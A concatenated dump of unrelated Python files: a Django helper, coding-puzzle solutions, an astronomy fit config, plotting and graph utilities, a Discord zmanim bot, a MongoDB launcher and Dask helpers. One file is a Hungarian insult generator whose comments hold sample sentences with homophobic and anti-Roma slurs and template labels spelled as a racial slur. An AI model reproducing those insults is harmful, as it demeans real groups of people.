11,043 | c822fa6b1fa22522050fd9c640b728494121a528 | from corehq import feature_previews, toggles
from corehq.apps.custom_data_fields.models import CustomDataFieldsDefinition
from corehq.apps.fixtures.dbaccessors import get_fixture_data_type_by_tag, get_fixture_items_for_data_type
from corehq.apps.linked_domain.util import _clean_json
from corehq.apps.locations.views import LocationFieldsView
from corehq.apps.products.views import ProductFieldsView
from corehq.apps.users.models import UserRole
from corehq.apps.users.views.mobile import UserFieldsView
def get_toggles_previews(domain):
return {
'toggles': list(toggles.toggles_dict(domain=domain)),
'previews': list(feature_previews.previews_dict(domain=domain))
}
def get_custom_data_models(domain, limit_types=None):
fields = {}
for field_view in [LocationFieldsView, ProductFieldsView, UserFieldsView]:
if limit_types and field_view.field_type not in limit_types:
continue
model = CustomDataFieldsDefinition.get(domain, field_view.field_type)
if model:
fields[field_view.field_type] = [
{
'slug': field.slug,
'is_required': field.is_required,
'label': field.label,
'choices': field.choices,
'regex': field.regex,
'regex_msg': field.regex_msg,
} for field in model.get_fields()
]
return fields
def get_fixture(domain, tag):
data_type = get_fixture_data_type_by_tag(domain, tag)
return {
"data_type": data_type,
"data_items": get_fixture_items_for_data_type(domain, data_type._id),
}
def get_user_roles(domain):
def _to_json(role):
return _clean_json(role.to_json())
return [_to_json(role) for role in UserRole.by_domain(domain)]
|
11,044 | 3a0641f4bab362e4777dbc87dc0cd4c8035f6871 | def factors(x):
c=[1]
for i in range(2,x//2+1):
if x%i==0:
c.append(i)
return c
def calc(num):
total=0
for x in range(2,num+1):
num//x
return total
n=int(input())
for i in range(n):
num=int(input())
print(calc(num))
print(factors(10**9)) |
11,045 | 0109fe82bd8dd6b3b0fb8d176166033b5730ace8 | # Example Keplerian fit configuration file
# Required packages for setup
import os
import pandas as pd
import numpy as np
import radvel
import os
# Define global planetary system and dataset parameters
starname = 'HD75732_2planet'
nplanets = 2 # number of planets in the system
instnames = ['k','j'] # list of instrument names. Can be whatever you like but should match 'tel' column in the input file.
ntels = len(instnames) # number of instruments with unique velocity zero-points
fitting_basis = 'per tc secosw sesinw k' # Fitting basis, see radvel.basis.BASIS_NAMES for available basis names
bjd0 = 0.0
planet_letters = {1: 'a', 2:'b'}
# Define prior centers (initial guesses) here.
params = radvel.RVParameters(nplanets,basis='per tc e w k') # initialize RVparameters object
params['per1'] = 14.6521 # period of 1st planet
params['tc1'] = 2074.31 # time of inferior conjunction of 1st planet
params['e1'] = 0.01 # eccentricity of 'per tc secosw sesinw logk'1st planet
params['w1'] = np.pi/2. # argument of periastron of the star's orbit for 1st planet
params['k1'] = 70.39 # velocity semi-amplitude for 1st planet
params['per2'] = 3847.22 # period of 2nd planet
params['tc2'] = 4441.57 # time of inferior conjunction of 2nd planet
params['e2'] = 0.19 # eccentricity of 'per tc secosw sesinw logk' 2nd planet
params['w2'] = np.pi/2. # argument of periastron of the star's orbit for 2nd planet
params['k2'] = 31.65 # velocity semi-amplitude for 2nd planet
##params['per3'] = 44.3886 # period of 3rd planet
##params['tc3'] = 2083.6 # time of inferior conjunction of 3rd planet
##params['e3'] = 0.35 # eccentricity of 'per tc secosw sesinw logk'3rd planet
##params['w3'] = np.pi/2. # argument of periastron of the star's orbit for 3rd planet
##params['k3'] = 10.73 # velocity semi-amplitude for 3rd planet
##
##params['per4'] = 2.81739 # period of 4th planet
##params['tc4'] = 1086.73 # time of inferior conjunction of 4th planet
##params['e4'] = 0.04 # eccentricity of 'per tc secosw sesinw logk' 4th planet
##params['w4'] = np.pi/2. # argument of periastron of the star's orbit for 4th planet
##params['k4'] = 5.57 # velocity semi-amplitude for 4th planet
##
##params['per5'] = 259.7 # period of 5th planet
##params['tc5'] = 2094.83 # time of inferior conjunction of 5th planet
##params['e5'] = 0.0 # eccentricity of 'per tc secosw sesinw logk' 5th planet
##params['w5'] = np.pi/2. # argument of periastron of the star's orbit for 5th planet
##params['k5'] = 5.0 # velocity semi-amplitude for 3rd planet
params['dvdt'] = 3.82108e-05 # slope
params['curv'] = -9.57252e-08 # curvature
params['gamma_k'] = 0.0 # velocity zero-point for hires_rk
params['jit_k'] = 2.6 # jitter for hires_rk
params['gamma_j'] = 1.02395 # " " hires_rj
params['jit_j'] = 7.83348 # " " hires_rj
# Load radial velocity data, in this example the data is contained in an hdf file,
# the resulting dataframe or must have 'time', 'mnvel', 'errvel', and 'tel' keys
data = pd.read_csv('C:/users/rscsa/Research/radvel-master/research/HD75732/HD75732.csv')
#data = rv[24:653] #rj data
data['time'] = data.jd
data['mnvel'] = data.mnvel
data['errvel'] = data.errvel
data['tel'] = data.tel
# Set parameters to be held constant (default is for all parameters to vary). Must be defined in the fitting basis
vary = dict(
#dvdt =False,
#curv =False,
#jit_j =False,
#per1 =False,
#tc1 =False,
#secosw1 =False,
#sesinw1 = False,
#e1=False,
#w1=False,
#k1=False
#per2 = False,
#tc2 = False,
#secosw2 = False,
#sesinw2 = False
)
# Define prior shapes and widths here.
priors = [
radvel.prior.EccentricityPrior( nplanets ), # Keeps eccentricity < 1
radvel.prior.PositiveKPrior( nplanets ), # Keeps K > 0
radvel.prior.Gaussian('per1',params['per1'],.25*params['per1']),
radvel.prior.Gaussian('per2',params['per2'],.25*params['per2']),
## radvel.prior.Gaussian('per3',params['per3'],.25*params['per3']),
## radvel.prior.Gaussian('per4',params['per4'],.25*params['per4']),
## radvel.prior.Gaussian('per5',params['per5'],.25*params['per5']),
radvel.prior.HardBounds('jit_j', 0.0, 15.0),
radvel.prior.HardBounds('jit_k', 0.0, 15.0)
]
time_base = np.mean([np.min(data.time), np.max(data.time)]) # abscissa for slope and curvature terms (should be near mid-point of time baseline)
# optional argument that can contain stellar mass and
# uncertainties. If not set, mstar will be set to nan.
# stellar = dict(mstar=1.12, mstar_err= 0.05)
# optional argument that can contain planet radii, used for computing densities
# planet = dict(
# rp1=5.68, rp_err1=0.56,
# rp2=7.82, rp_err2=0.72,
# )
|
11,046 | 8f666a0d092f0039e338468778a7e41b46effbcd | """
Given an array of positive integers nums, remove the smallest subarray (possibly empty) such that the sum of the remaining elements is divisible by p. It is not allowed to remove the whole array.
Return the length of the smallest subarray that you need to remove, or -1 if it's impossible.
A subarray is defined as a contiguous block of elements in the array.
Example 1:
Input: nums = [3,1,4,2], p = 6
Output: 1
Explanation: The sum of the elements in nums is 10, which is not divisible by 6. We can remove the subarray [4], and the sum of the remaining elements is 6, which is divisible by 6.
Example 2:
Input: nums = [6,3,5,2], p = 9
Output: 2
Explanation: We cannot remove a single element to get a sum divisible by 9. The best way is to remove the subarray [5,2], leaving us with [6,3] with sum 9.
Example 3:
Input: nums = [1,2,3], p = 3
Output: 0
Explanation: Here the sum is 6. which is already divisible by 3. Thus we do not need to remove anything.
Example 4:
Input: nums = [1,2,3], p = 7
Output: -1
Explanation: There is no way to remove a subarray in order to get a sum divisible by 7.
Example 5:
Input: nums = [1000000000,1000000000,1000000000], p = 3
Output: 0
Constraints:
1 <= nums.length <= 105
1 <= nums[i] <= 109
1 <= p <= 109
"""
class Solution:
def minSubarray(self, nums, p: int) -> int:
"""
TLE
"""
tmp, preSum = 0, [0]
length = len(nums)
for num in nums:
tmp = (tmp + num) % p
preSum.append(tmp)
total = preSum[-1]
# print(preSum)
for l in range(length):
for i in range(length-l+1):
if (total - (preSum[i+l] - preSum[i])) % p == 0:
return l
return -1
class Solution:
def minSubarray(self, nums, p: int) -> int:
tmp, length = 0, len(nums)
total = sum(nums)
if total < p:
return -1
elif total % p == 0:
return 0
else:
total = total % p
pos_dict = {0: 0}
res = length
for i in range(1, length+1):
tmp = (tmp + nums[i-1]) % p
target = (tmp - total) % p
if target in pos_dict:
res = min(res, i - pos_dict[target])
pos_dict[tmp] = i
return res if res != length else -1
class Solution:
def minSubarray(self, A, p):
need = sum(A) % p
dp = {0: -1}
cur = 0
res = n = len(A)
for i, a in enumerate(A):
cur = (cur + a) % p
dp[cur] = i
if (cur - need) % p in dp:
res = min(res, i - dp[(cur - need) % p])
return res if res < n else -1
S = Solution()
nums = [3,1,4,2]
p = 6
print(S.minSubarray(nums, p))
nums = [6,3,5,2]
p = 9
print(S.minSubarray(nums, p))
nums = [1,2,3]
p = 3
print(S.minSubarray(nums, p))
nums = [1,2,3]
p = 7
print(S.minSubarray(nums, p))
nums = [1000000000,1000000000,1000000000]
p = 3
print(S.minSubarray(nums, p))
nums = [4,4,2]
p = 7
print(S.minSubarray(nums, p))
nums =[8,32,31,18,34,20,21,13,1,27,23,22,11,15,30,4,2]
p = 148
print(S.minSubarray(nums, p)) |
11,047 | 62edaffc121a6f311b5faa8b7d7f76c29b5b37af | import numpy as np
import seaborn as sns
import pandas as pd
from plotly import graph_objects as go
from matplotlib.axes._subplots import SubplotBase
from matplotlib import pyplot as plt
from itertools import accumulate
import cv2
from PIL.JpegImagePlugin import JpegImageFile
from PIL import ImageDraw, ImageFont
font_path = "/usr/share/fonts/truetype/lato/Lato-Bold.ttf"
font = ImageFont.truetype(font_path, size=20)
def barplot(ax, title, labels, legends, *args):
r = np.arange(len(labels))
width = 0.8/len(args)
palette = sns.diverging_palette(255, 133, l=60, n=len(legends), center="dark")
# set titles
ax.set_title(title)
# set ticks
ax.set_xticks(r)
ax.set_xticklabels(labels)
for i, arg in enumerate(args):
# ax.bar((r-0.8) + width*i, arg, width, label=legends[i], color=palette[i])
widths = np.arange(len(args)) * width
ax.bar(r + (widths[i] - np.median(widths)), arg, width, label=legends[i], color=palette[i])
ax.set_axisbelow(True)
ax.grid(which='major', axis='y', fillstyle='bottom')
ax.legend(loc='upper right')
def stacked_bar(ax, title, labels, legends, *args, active_legends=True):
r = np.arange(len(labels))
barWidth = 0.8
palette = sns.diverging_palette(255, 133, l=60, n=len(legends), center="dark")
# set titles
ax.set_title(title)
# set ticks
ax.set_xticks(r)
ax.set_xticklabels(labels)
yticks = ax.get_yticks()
ax.set_yticklabels([f"{x*100:.0f}%" for x in yticks])
# func to calc the bottom
calc_bottom = lambda a, b: [i+j for i, j in zip(a, b)]
# draw first bar
ax.bar(r, args[0], width=barWidth, label=legends[0], color=palette[0])
if active_legends:
for j, v in enumerate(args[0]):
if v > 3:
ax.text(-0.17 + j*1, (v - 8),
f"{v:2.2f}%", color='white', fontweight='bold')
# draw bars after the first
for i, bottom in enumerate(accumulate(args[:-1], calc_bottom), 1):
ax.bar(r, args[i], bottom=bottom, width=barWidth, label=legends[i],
color=palette[i])
if active_legends:
for j, v in enumerate(args[i]):
if v > 9:
ax.text(-0.17 + j*1, (v - 8) + bottom[j],
f"{v:2.2f}%", color='white', fontweight='bold')
# legend
ax.legend(loc='lower right')
def sankey(df, height, width, classes_ref, title, pad=5, pos_leg=None):
fig = go.Figure(data=[go.Sankey(
name='bruno',
valueformat="",
valuesuffix="",
node=dict(
groups=[[1]]*(classes_ref.Label.nunique() - 1),
pad=pad,
thickness=10,
line=dict(color="black", width=0.5),
label=classes_ref.sort_values(by=['Id']).Label.unique(),
color=(classes_ref.sort_values(by=['Id'])
.drop_duplicates(['Id'])
.Leaf
.apply(lambda x: "#c8d419" if x else "#f63a76"))
),
link=dict(
source=df.IdParent.values,
target=df.Id.values,
value=np.ones(df.shape[0]),
color="#ebebeb"))])
fig.update_layout(title_text=title, font_size=10)
fig.update_layout(height=height, width=width)
fig.update_layout(showlegend=True)
if pos_leg:
fig.update_layout(go.Layout(
annotations=[
go.layout.Annotation(
text='<b>Leaf</b>',
align='left',
showarrow=False,
x=pos_leg[0][0],
y=pos_leg[0][1],
font=dict(
size=12,
color='#444444'
),
bordercolor='#000000',
bgcolor='#c8d419',
borderwidth=1
),
go.layout.Annotation(
text='<b>Path</b>',
align='left',
showarrow=False,
font=dict(
size=12,
color='#ffffff'
),
x=pos_leg[1][0],
y=pos_leg[1][1],
bordercolor='#000000',
bgcolor='#f63a76',
borderwidth=1)]))
return fig
def show_imgs(imgs, ax_array, df_imgs):
for i, ax_i in enumerate(ax_array):
for j, ax in enumerate(ax_i):
img = imgs.iloc[i*2 + j]
ref = df_imgs.loc[img.ImageID]
# cleaning axes
ax.set_xticks([])
ax.set_yticks([])
ax.grid()
ax.set_title(f"{img.LabelSemantic.upper()}")
img_path = ref.Path
raw = cv2.imread(img_path)
ax.imshow(cv2.cvtColor(raw, cv2.COLOR_RGB2BGR))
def show_bbox(imgs, ax_array, df_imgs, df_meta, print_others=True):
for i, ax_i in enumerate(ax_array):
for j, ax in enumerate(ax_i):
meta = imgs.iloc[i*2 + j]
ref = df_imgs.loc[meta.ImageID]
# cleaning axes
ax.set_xticks([])
ax.set_yticks([])
ax.grid()
ax.set_title(f"{meta.LabelSemantic.upper()} - {'/'.join(ref.Path.split('/')[2:])}")
img_path = ref.Path
raw = cv2.imread(img_path)
res = cv2.resize(raw, (int(raw.shape[1]/3), int(raw.shape[0]/3)))
if print_others:
for x in df_meta[df_meta.ImageID == meta.ImageID].itertuples():
add_bbox(res, x)
add_bbox(res, meta, True)
ax.imshow(cv2.cvtColor(res, cv2.COLOR_RGB2BGR))
def add_bbox(img, meta, principal=False):
left_bottom = (int(img.shape[1] * meta.XMin),
int(img.shape[0] * meta.YMin))
right_top = (int(img.shape[1] * meta.XMax),
int(img.shape[0] * meta.YMax))
color = (55, 255, 0) if principal else (255, 210, 0)
cv2.rectangle(img, left_bottom, right_top, color, 2)
def plot_heatmap_corr(df, principal, secondary, figsize):
df_aux = _create_df_percentage(df, principal, secondary)
fig, axes = plt.subplots(1, df_aux.shape[1], sharey=True, figsize=figsize)
for i, col in enumerate(df_aux):
sns.heatmap(df_aux[[col]], annot=True, ax=axes[i],
vmin=0, vmax=1, cmap="YlGnBu")
axes[i].set_ylim(0, df_aux.shape[0])
fig.text(0.5, 0, principal, ha='center', fontsize=14)
fig.text(0.05, 0.5, secondary, va='center', rotation='vertical', fontsize=14)
return fig, axes
def _create_df_percentage(df, principal, secondary):
arr = []
principal_values = df[principal].unique()
secondary_values = df[secondary].unique()
for line in principal_values:
total = df[df[principal] == line].shape[0]
for col in secondary_values:
arr.append(df[(df[principal] == line)
& (df[secondary] == col)].shape[0] / total)
arr_aux = np.transpose(np.reshape(arr, (len(principal_values),
len(secondary_values))))
return (pd.DataFrame(arr_aux, columns=principal_values, index=secondary_values)
.sort_index(ascending=True))
def draw_bbox(img, bbox: list,
gca_axes: SubplotBase = None,
label: str = None,
color: str = "#00ffff") -> SubplotBase:
"""Use the center, width and height to draw the bounding box"""
cx, cy, w, h = bbox
if not gca_axes:
gca_axes = plt.gca()
top_bottom_pt = ((cx - w/2) * img.size[0],
(cy - h/2) * img.size[1])
gca_axes.add_patch(plt.Rectangle(top_bottom_pt,
w * img.size[0], h * img.size[1],
color=color, fill=False, linewidth=2))
font = {'color': 'white',
'weight': 'bold',
'size': 16}
if label:
gca_axes.text(top_bottom_pt[0], top_bottom_pt[1], label,
fontdict=font,
bbox={'facecolor': '#00abab', 'alpha': 1})
return gca_axes
def draw_many_bboxes(img, bboxes: np.array,
gca_axes: SubplotBase = None,
label: np.array = None,
color: str = "#00ffff") -> SubplotBase:
"""Use the center, width and height to draw the bounding box"""
if label is None:
label = [""] * bboxes.shape[0]
if isinstance(label, str):
label = [label] * bboxes.shape[0]
for row, label in zip(bboxes, label):
gca_axes = draw_bbox(img, row, gca_axes, label, color)
return gca_axes
|
11,048 | 06f14b4423bfd59e092263303e5423468bb7f26c | op = 0
S = "()(())"
a = ""
for i in S:
if i == '(' and op > 0:
a += i
elif i == ')' and op > 1:
a += i
op += 1 if i == '(' else -1
print(a)
|
11,049 | 7c47299690bc30c3e8278c68cb838b63faf38be6 |
from ibm_watson import TextToSpeechV1
from ibm_watson.websocket import RecognizeCallback, AudioSource
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
authenticator = IAMAuthenticator('api key goes here')
tts = TextToSpeechV1(authenticator=authenticator)
#Insert URL in place of 'API_URL'
tts.set_service_url('api url goes here')
# recognize text using IBM Text to Speech from txt file
# save TTS as mp3 file
with open('stt-output.txt', 'r') as txt:
text = txt.read()
with open('./tts-output.mp3', 'wb') as audio_file:
res = tts.synthesize(text, accept='audio/mp3', voice='en-US_AllisonV3Voice').get_result()
audio_file.write(res.content) #write the content to the audio file
print("Process completed >> File saved")
|
11,050 | bb28285b6b778ed9b8921f5724105fd151c2871e | from types import SimpleNamespace
from collections import deque
from random import sample
nedges = lambda G: sum(map(len, G)) // 2
def removeEdges(G, edges):
for u, v in edges:
G[u].remove(v)
G[v].remove(u)
def addEdges(G, edges):
for u, v in edges:
G[u].append(v)
G[v].append(u)
def bfs(G, s, fun, data):
marked = [False] * len(G)
marked[s] = True
queue = deque([s])
while queue:
u = queue.popleft()
for v in G[u]:
fun(u, v, marked)
if data.sentinel: return
if not marked[v]:
marked[v] = True
queue.append(v)
def nonBridges(G, s, lim):
data = SimpleNamespace(
sentinel=False,
edges=set(),
parent = [None] * len(G)
)
def fun(u, v, marked):
if marked[v] and data.parent[u] != v:
data.edges.add((min(u,v), max(u,v)))
if len(data.edges) >= lim:
data.sentinel = True
elif not marked[v]:
data.parent[v] = u
bfs(G, s, fun, data)
return data.edges
def nonEdgesCoro(G, s):
n = len(G)
connected = [False] * n
marked = [False] * n
marked[s] = True
queue = deque([s])
while queue:
u = queue.popleft()
for v in G[u]:
connected[v] = True
if not marked[v]:
queue.append(v)
marked[v] = True
for w in sample(range(n), n):
if not connected[w] and w != u:
yield (min(u,w), max(u,w))
else: connected[w] = False
def nonEdges(G, s, lim):
coro = nonEdgesCoro(G, s)
edges = set()
for e in coro:
edges.add(e)
if len(edges) >= lim:
break
return edges
|
11,051 | ab56c0b725afbfd09cec7b34ff59fd536ec37cfc | from django.contrib import admin
from scoreboard.models import Team, Competition, Score
admin.site.register(Team)
admin.site.register(Competition)
admin.site.register(Score)
|
11,052 | 455ffd2e33b83df55cd837cd004ddff7805a87b4 | # 2022-10-17
# week3 - 재귀함수와 정렬. 수 정렬하기
# https://www.acmicpc.net/problem/2750
# 소요시간 : 16:42 ~ 16:43 (1m)
import sys
input = sys.stdin.readline
N = int(input())
data = [int(input()) for _ in range(N)]
data.sort()
for d in data:
print(d)
|
11,053 | 97a891df61287c32c90e22a6ae2e19d8c072efc0 | # coding=utf-8
import os
import random
import codecs
import sys
import inspect
import subprocess
import RPi.GPIO as GPIO
import time
#determine the asshole fucking path of the cocksucker source files shit, and the fucking result fuck
script_dir = os.path.dirname(__file__)
rel_path = "/home/pi/Desktop/gyalazo-v5/src/"
dictionarypath = os.path.join(script_dir, rel_path)
script_dir = os.path.dirname(__file__)
rel_path = "/home/pi/Desktop/gyalazo-v5/res/"
resultpath = os.path.join(script_dir, rel_path)
#put the fucking dictionary files to shit arrays
dictnum=0
dictionaryfiles = []
for r, d, f in os.walk(dictionarypath):
for file in f:
if '.txt' in file:
dictname=(file[0:-4])
dictionaryfiles.append(dictname)
#get the asshole words from files and put them into the dick arrays, with names by dicts
dictfile = dictionarypath + dictionaryfiles[dictnum] + '.txt'
with codecs.open(dictfile, encoding='latin1') as fp:
line = fp.readline()
vars()[dictname]=[] #set this fuck to empty first
while line:
vars()[dictname].append(line.strip())
line = fp.readline()
dictnum=dictnum+1
#this fucker function is random-sentence (rstc), the motherfucker "pos" means part-of-speech
def rstc(pos):
uppercase=0
space=0
speakout=[]
wordtype=[]
protectedwordtypes=["byname", "cm", "conj", "conjand", "gly", "ijt", "pnoun", "qm", "qone", "qthree", "qtwo"] #protected word type is for not to delete from that dictionary, because no much of it, and we can use it multiple times
needcapitalize=["gly","qm"] #after this pissed of types, the next letter will be uppercase
needspace=["cm","gly","qm"] #afther this asshole word types the next character will be space
vowels=["a","á","o","ó","u","ú","e","é","i","í","ö","o","ü","u"] #just for specific countries
for x in range(len(pos)):
actdictname=pos[x] #name of the fucking type of word
actdictlen=len(eval(pos[x])) #the actual dictionary's bitching length
actdictarrname=eval(pos[x])
wordtype.append(actdictname)
if actdictlen > 0:
gennum=random.randrange(0, actdictlen, 1)
actdictval=eval(pos[x])[gennum] #the cockfucker word
speakout.append(actdictval)
if actdictname not in protectedwordtypes:
actdictarrname.remove(actdictval)
f=open("/home/pi/Desktop/gyalazo-v5/res/result.txt","w") #opening result.txt for writing. this is because we cannot speak out realtime with espeak some kind of lagging shit... so we will store the whole sentence, and speak it out after it generated
for z in range(len(speakout)): #here we do a couple of shit, determining do we need a space or an uppercase letter
uppercase=0
space=0
if z==0 or wordtype[z-1] in needcapitalize:
uppercase=1
if z!=0:
if wordtype[z] not in needspace:
space=1
# lets start to fucking determine the next first shit character to decide which assfucker
if wordtype[z]=="byname":
nextw=speakout[z+1][:1]
if str(nextw.encode('utf-8').strip()) in vowels: #if the next word begins with a vowel
speakout[z]=byname[1] #article1 before word
else:
speakout[z]=byname[0] #article2 before word
if space==1:
f.write(str(" ")) #we need a space
space=0
if uppercase==0: #do we need an uppercase letter?
f.write(str(speakout[z].encode('utf-8').strip())) #no
if uppercase==1:
f.write(str(speakout[z].encode('utf-8').capitalize().strip())) #yes
uppercase=0
f=open("/home/pi/Desktop/gyalazo-v5/res/result.txt","r") #our result is ready to read
contents=f.read() #read out to the contents variable
print(contents) #print that shit!
subprocess.check_output('espeak -vhu+m1 -f /home/pi/Desktop/gyalazo-v5/res/result.txt -p30 -s200 -a100 ', shell=True) #speak that shit! (with a command executed in the terminal
f.close() #close that shit!
#-------- sucker sentence examples: --------#
# Mi a kurva anyádat nézel te faszkalap? Szájbabaszlak te buzi köcsög! Na takarodj a büdös picsába!
# Mit bámulsz buzigyerek? Szétbaszom a nyűves pofádat te cigány. Húzz a picsába, mert szétfejellek te köcsög.
# Kinek ugatsz te faszkalap? Anyádon rúglak, véged köcsög. Szopd le a faszomat és húzzd el a beled de geci gyorsan, mielőtt szétbaszlak.
#-------- fucking hungarian help: --------#
# adj - melleknev
# byname - nevelo (a, az) ------ [protected]
# cm - comma (,) ----------- [protected]
# conj - conjunction (mert) -- [protected]
# conjand - conjuction and (és) - [protected]
# gly - irasjel (. !) ------- [protected]
# ijt - indulatszo (na) ----- [protected]
# noun - fonev
# nounverb - fonevi igenev
# pnoun - nevmas (te) --------- [protected]
# pverb - igekoto ige
# qm - kerdojel (?) -------- [protected]
# qone - kerdoszo1 (mi) ------ [protected]
# qthree - kerdoszo3 (kinek) --- [protected]
# qtwo - kerdoszo2 (mit) ----- [protected]
# subj - targy
# subjto - noun to
# verb - ige
gennum=random.randrange(0, 8, 1) #generating the sentence structure, the range is depends on how many predefined structure is here. the more you have, the less it will be unnatural
if gennum==0:
rstc(["byname","adj","adj","subj","subj","noun","cm","nounverb","pnoun","subj","gly"]) #shark1
if gennum==1:
rstc(["qtwo","verb","pnoun","adj","adj","subj","qm","pverb","pnoun","adj","adj","subj","gly"]) #shark2
if gennum==2:
rstc(["pnoun","adj","adj","subj","cm","pverb","conjand","pverb","pnoun","adj","adj","subj","subj","gly"]) #bnsgt1
if gennum==3:
rstc(["qtwo","verb","subj","cm","nounverb","byname","subj","subj","subjto","gly"]) #bnsgt2
if gennum==4:
rstc(["pverb","pnoun","adj","subj","cm","conj","nounverb","pnoun","subj","gly"]) #niga1
if gennum==5:
rstc(["ijt","pnoun","subj","gly","qone","byname","noun","verb","pnoun","adj","subj","gly"]) #niga2
if gennum==6:
rstc(["nounverb","pnoun","subj","subj","subj","gly"]) #gandi1
if gennum==7:
rstc(["qtwo","verb","pnoun","adj","adj","subj","qm"]) #gandi2
fout = open("/home/pi/Desktop/gyalazo-v5/log/log.txt", "a") #open log for appending
fout.write("ver: " + str(gennum) + " | ") #write the sentence version. In that case my friends helped me, so I want to know which sentence was which guy
fout.close() #close that shit!
|
11,054 | 9ae534c5e994560ca3b5dda735d7dbdec65fd088 | #!/usr/bin/python
import os
bin_path = os.path.dirname(__file__)
db_path = os.path.join(bin_path, "..", "data")
log_path = os.path.join(db_path, "log")
mongo_bin = os.path.join(bin_path, "mongod")
mongodb_lock = "mongod.lock"
silence = " >/dev/null 2>&1"
os.popen('mkdir -p ' + log_path)
try:
pid = file(os.path.join(db_path, mongodb_lock)).read().strip()
print("killing existing mongodb ... pid: " + pid)
os.popen('kill ' + pid + silence)
except:
print("mongodb instance not existed, ready to start.")
try:
os.popen(mongo_bin + ' --fork --logpath ' + os.path.join(log_path, 'mongod.log') + \
' --dbpath ' + db_path)
pid = file(os.path.join(db_path, mongodb_lock)).read().strip()
print("mongodb started. pid: " + pid)
except:
print("failed to start mongodb")
|
11,055 | 0b8d6be888c613886d89e4ca20ac144d2ff6a3b1 | import discord
from discord.ext import commands, tasks
from aiohttp import ClientSession
import aiosqlite
from sendText import create_embed
import hdate
import datetime
from geopy.geocoders import Nominatim
from tzwhere import tzwhere
class Zmanim(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.session = ClientSession(loop=bot.loop)
@commands.command(name="setLocationByCoordinates")
async def set_location_by_coordinates(self, ctx, latitude, longtiude, timezone, diaspora):
if ctx.channel.type is not discord.ChannelType.private:
await create_embed(ctx, "This command is only for DMs!")
else:
db = await aiosqlite.connect("haGaon.db")
cursor = await db.cursor()
await cursor.execute(f"SELECT user_id FROM main WHERE user_id = {ctx.message.author.id}")
result = await cursor.fetchone()
if result is None:
sql = (
"INSERT INTO main(user_id, latitude, longitude, timezone, diaspora) VALUES(?, ?, ?, ?, ?)"
)
val = (ctx.message.author.id, latitude, longtiude, timezone, diaspora)
elif result is not None:
sql = "UPDATE main SET latitude = ?, longitude = ?, timezone = ?, diaspora = ? WHERE user_id = ?"
val = (latitude, longtiude, timezone, diaspora, ctx.message.author.id)
await cursor.execute(sql, val)
await db.commit()
await cursor.close()
await db.close()
await create_embed(ctx, "Location Set and Saved!")
@commands.command(name="setLocationByAddress")
async def set_location_by_address(self, ctx, *address):
if ctx.channel.type is not discord.ChannelType.private:
await create_embed(ctx, "This command is only for DMs!")
else:
geolocator = Nominatim(user_agent="HaGaon HaMachane")
address_str = " ".join(address)
location = geolocator.geocode(address_str, language="en")
await create_embed(ctx, "Processing, this will take a second...")
tzwhere_obj = tzwhere.tzwhere()
timezone = tzwhere_obj.tzNameAt(location.latitude, location.longitude)
if "Israel" in location.address:
diaspora = "True"
else:
diaspora = "False"
print(f"{timezone} {diaspora} {location.raw}")
db = await aiosqlite.connect("haGaon.db")
cursor = await db.cursor()
await cursor.execute(f"SELECT user_id FROM main WHERE user_id = {ctx.message.author.id}")
result = await cursor.fetchone()
if result is None:
sql = (
"INSERT INTO main(user_id, latitude, longitude, timezone, diaspora) VALUES(?, ?, ?, ?, ?)"
)
val = (ctx.message.author.id, location.latitude, location.longitude, timezone, diaspora)
elif result is not None:
sql = "UPDATE main SET latitude = ?, longitude = ?, timezone = ?, diaspora = ? WHERE user_id = ?"
val = (location.latitude, location.longitude, timezone, diaspora, ctx.message.author.id)
await cursor.execute(sql, val)
await db.commit()
await cursor.close()
await db.close()
await create_embed(ctx, "Location Set and Saved!")
@commands.command(name="zmanim")
async def getZmanim(self, ctx):
db = await aiosqlite.connect("haGaon.db")
cursor = await db.cursor()
await cursor.execute(f"SELECT * FROM main WHERE user_id = {ctx.message.author.id}")
result = await cursor.fetchone()
if result is None:
await create_embed(ctx, "Run setLocation first!!")
elif result is not None:
dias = result[4] == "True"
location = hdate.Location(
longitude=float(result[2]), latitude=float(result[1]), timezone=result[3], diaspora=dias,
)
await create_embed(ctx, str(hdate.Zmanim(location=location, hebrew=False)))
await cursor.close()
await db.close()
def setup(bot):
bot.add_cog(Zmanim(bot))
|
11,056 | d58429be84c4b569a399377cecd6b6a681f60fca | # Generated by Django 3.0.4 on 2020-04-20 12:23
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('shop', '0004_auto_20200419_0825'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='price_sale',
),
]
|
11,057 | 809b440dd1fffe1c990ee180a06398c1652346ea | class Solution(object):
def sortColors(self, nums):
"""
:type nums: List[int]
:rtype: void Do not return anything, modify nums in-place instead.
"""
zero, one, two = 0, 0, len(nums) - 1
while one <= two:
if nums[one] == 0:
nums[zero], nums[one] = nums[one], nums[zero]
zero += 1
one += 1
elif nums[one] == 1:
one += 1
else:
nums[one], nums[two] = nums[two], nums[one]
two -= 1
|
11,058 | 7e9b565cc0b72faa96659aadf428c74e140bf749 | import robloxapi, json
client = robloxapi.client()
groupId = input("Please enter a valid groupId")
wallJSON = json.dumps(client.Group.getWall(groupId))
jsonFile = open("groupWall.json", "w")
jsonFile.write(wallJSON) |
11,059 | 077844639c8310253ac5a72fd9e59f1f72e1b858 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Flete',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
],
),
migrations.CreateModel(
name='TipoRenta',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('dias', models.DateField()),
('semanas', models.DateField()),
],
),
migrations.CreateModel(
name='Usuario',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('nombre', models.CharField(max_length=50)),
('apellidos', models.CharField(max_length=60)),
],
),
]
|
11,060 | c6131de63fc20da24feb18993e839f7ee39e41bb | import os
from dask.distributed import Client
import distributed
from Tools.condor_utils import make_htcondor_cluster
from dask.distributed import Client, progress
def getWorkers( client ):
logs = client.get_worker_logs()
return list(logs.keys())
def getAllWarnings( client ):
logs = client.get_worker_logs()
workers = getWorkers( client )
for worker in workers:
for log in logs[worker]:
if log[0] == 'WARNING' or log[0] == 'ERROR':
print ()
print (" ### Found warning for worker:", worker)
print (log[1])
def getFilesNotFound( client ):
allFiles = []
logs = client.get_worker_logs()
workers = getWorkers( client )
for worker in workers:
for log in logs[worker]:
